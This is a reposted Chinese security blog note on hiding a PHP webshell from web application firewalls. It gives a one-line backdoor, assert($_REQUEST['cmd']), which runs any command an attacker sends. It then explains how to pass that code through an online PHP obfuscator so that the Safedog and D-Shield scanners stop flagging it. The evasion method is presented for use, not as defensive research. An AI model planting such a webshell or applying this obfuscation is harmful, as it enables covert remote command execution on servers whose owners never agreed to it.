技术笔记

新思路php一句话过waf

字号+ 作者:Mr.Wu 来源:转载 2018-03-22 09:10 我要评论( )

前几天审计一套系统发现进行了加密 https://www.mfenc.com/, 网上解密还要钱就放弃了...只了解过安全狗 和 D盾, 检测过程大概类似于记事本打开查看有没有关键函数,......

前几天审计一套系统发现进行了加密 https://www.mfenc.com/, 网上解密还要钱就放弃了...

只了解过安全狗 和 D盾, 检测过程大概类似于记事本打开查看有没有关键函数, 特征码之类的

只要把代码加密得让安全狗 D盾 无法识别, 自然也就检测不出来了, 但由于 php 的一些神奇特性, 可以成功执行..

php 加密主要有 zend ioncube 还有国内的其他加密(比如上面的 mfenc), zend 和 ioncube 都需要扩展文件

国内的一些加密 http://enphp.djunny.com/ 和 http://www.phpjm.net/

新思路php一句话过waf

新思路php一句话过waf

无需安装额外插件
这里就以 http://enphp.djunny.com/ 为例子吧, http://www.phpjm.net 的加密含有非 ANSI 字符会被 D盾 检测到
原始的一句话代码


  1. <?php // shell.php assert($_REQUEST['cmd']); ?>

新思路php一句话过waf

新思路php一句话过waf

在线加密一下

新思路php一句话过waf

混淆选择字母, 乱码可能会被 D盾 检测到 加密后的代码 shell_encode.php

新思路php一句话过waf

D盾 已经检测不出来了

新思路php一句话过waf


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/679.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~